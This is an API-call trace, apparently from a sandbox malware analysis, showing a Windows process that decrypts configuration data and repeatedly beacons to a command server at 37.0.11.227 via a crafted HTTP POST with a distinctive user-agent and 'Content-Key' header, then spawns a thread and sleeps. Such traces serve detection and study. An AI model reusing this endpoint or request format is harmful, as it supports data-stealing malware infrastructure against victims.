LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.827] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0304.827] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.828] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0304.828] GetProcessHeap () returned 0x690000 [0304.828] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0304.828] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0304.828] GetProcessHeap () returned 0x690000 [0304.829] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0304.829] GetProcessHeap () returned 0x690000 [0304.829] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0304.829] GetProcessHeap () returned 0x690000 [0304.830] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0304.830] GetProcessHeap () returned 0x690000 [0304.830] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0304.831] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.831] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.837] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0304.844] GetProcessHeap () returned 0x690000 [0304.844] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0304.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.845] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0304.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.846] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.847] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.847] GetProcessHeap () returned 0x690000 [0304.848] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0304.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.849] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0304.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.850] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0304.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.851] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0304.851] GetProcessHeap () returned 0x690000 [0304.851] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0304.852] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.852] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0304.853] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.853] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0304.855] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.856] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0304.857] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.857] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0304.857] GetProcessHeap () returned 0x690000 [0304.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0304.857] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0304.857] GetProcessHeap () returned 0x690000 [0304.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0304.857] socket (af=2, type=1, protocol=6) returned 0xa10 [0304.858] connect (s=0xa10, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0304.882] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0304.882] GetProcessHeap () returned 0x690000 [0304.882] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0304.882] GetProcessHeap () returned 0x690000 [0304.882] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0304.882] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0304.883] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0304.883] GetProcessHeap () returned 0x690000 [0304.883] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0304.883] GetProcessHeap () returned 0x690000 [0304.884] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0304.884] GetProcessHeap () returned 0x690000 [0304.884] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0304.884] GetProcessHeap () returned 0x690000 [0304.884] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0304.885] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0304.886] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0304.886] GetProcessHeap () returned 0x690000 [0304.886] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0304.886] GetProcessHeap () returned 0x690000 [0304.886] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0304.886] send (s=0xa10, buf=0x6ad508*, len=242, flags=0) returned 242 [0304.887] send (s=0xa10, buf=0x6aba40*, len=159, flags=0) returned 159 [0304.887] GetProcessHeap () returned 0x690000 [0304.887] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0304.887] recv (in: s=0xa10, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0304.969] GetProcessHeap () returned 0x690000 [0304.970] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0304.971] GetProcessHeap () returned 0x690000 [0304.971] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0304.971] GetProcessHeap () returned 0x690000 [0304.971] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0304.971] GetProcessHeap () returned 0x690000 [0304.972] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0304.972] closesocket (s=0xa10) returned 0 [0304.974] GetProcessHeap () returned 0x690000 [0304.974] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0304.974] GetProcessHeap () returned 0x690000 [0304.974] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0304.975] GetProcessHeap () returned 0x690000 [0304.975] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0304.975] GetProcessHeap () returned 0x690000 [0304.976] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0304.976] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x22c) returned 0xa10 [0304.978] Sleep (dwMilliseconds=0xea60) [0304.979] GetProcessHeap () returned 0x690000 [0304.979] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0304.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.980] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.000] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0305.010] GetProcessHeap () returned 0x690000 [0305.010] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0305.011] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.011] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0305.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.012] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0305.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.017] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.017] GetProcessHeap () returned 0x690000 [0305.017] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0305.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.018] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0305.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.019] CryptDestroyKey (hKey=0x69d628) returned 1 [0305.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.020] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0305.020] GetProcessHeap () returned 0x690000 [0305.020] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0305.020] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.021] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0305.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.022] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0305.022] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.022] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0305.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.024] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0305.024] GetProcessHeap () returned 0x690000 [0305.024] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0305.024] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0305.024] GetProcessHeap () returned 0x690000 [0305.025] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0305.025] GetProcessHeap () returned 0x690000 [0305.025] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0305.025] GetProcessHeap () returned 0x690000 [0305.025] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0305.025] GetProcessHeap () returned 0x690000 [0305.025] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0305.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.026] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0305.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.031] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0305.036] GetProcessHeap () returned 0x690000 [0305.036] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0305.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.040] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0305.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.041] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0305.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.043] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.043] GetProcessHeap () returned 0x690000 [0305.043] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0305.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.044] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0305.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.045] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0305.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.046] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0305.046] GetProcessHeap () returned 0x690000 [0305.046] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0305.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.047] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0305.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.048] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0305.049] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.049] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0305.049] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.050] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0305.050] GetProcessHeap () returned 0x690000 [0305.050] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0305.050] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0305.050] GetProcessHeap () returned 0x690000 [0305.050] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3b0 [0305.050] socket (af=2, type=1, protocol=6) returned 0xa14 [0305.051] connect (s=0xa14, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0305.077] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0305.077] GetProcessHeap () returned 0x690000 [0305.077] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0305.077] GetProcessHeap () returned 0x690000 [0305.077] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0305.078] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0305.078] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0305.079] GetProcessHeap () returned 0x690000 [0305.079] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0305.079] GetProcessHeap () returned 0x690000 [0305.079] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0305.079] GetProcessHeap () returned 0x690000 [0305.079] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0305.079] GetProcessHeap () returned 0x690000 [0305.079] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0305.080] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0305.080] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0305.081] GetProcessHeap () returned 0x690000 [0305.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0305.081] GetProcessHeap () returned 0x690000 [0305.081] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0305.081] send (s=0xa14, buf=0x6ad508*, len=242, flags=0) returned 242 [0305.081] send (s=0xa14, buf=0x6aba40*, len=159, flags=0) returned 159 [0305.082] GetProcessHeap () returned 0x690000 [0305.082] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0305.082] recv (in: s=0xa14, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0305.153] GetProcessHeap () returned 0x690000 [0305.153] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0305.153] GetProcessHeap () returned 0x690000 [0305.154] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0305.154] GetProcessHeap () returned 0x690000 [0305.154] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0305.154] GetProcessHeap () returned 0x690000 [0305.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0305.155] closesocket (s=0xa14) returned 0 [0305.155] GetProcessHeap () returned 0x690000 [0305.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3b0 | out: hHeap=0x690000) returned 1 [0305.155] GetProcessHeap () returned 0x690000 [0305.156] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0305.156] GetProcessHeap () returned 0x690000 [0305.156] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0305.156] GetProcessHeap () returned 0x690000 [0305.157] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0305.157] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x137c) returned 0xa14 [0305.158] Sleep (dwMilliseconds=0xea60) [0305.160] GetProcessHeap () returned 0x690000 [0305.160] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0305.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.161] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0305.166] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.166] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0305.171] GetProcessHeap () returned 0x690000 [0305.171] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0305.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.172] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0305.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.173] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0305.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.174] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.174] GetProcessHeap () returned 0x690000 [0305.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0305.175] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.175] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0305.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.176] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0305.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.177] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0305.177] GetProcessHeap () returned 0x690000 [0305.177] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0305.178] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.179] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0305.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.180] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0305.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.181] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0305.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.183] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0305.183] GetProcessHeap () returned 0x690000 [0305.183] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0305.183] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0305.183] GetProcessHeap () returned 0x690000 [0305.184] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0305.184] 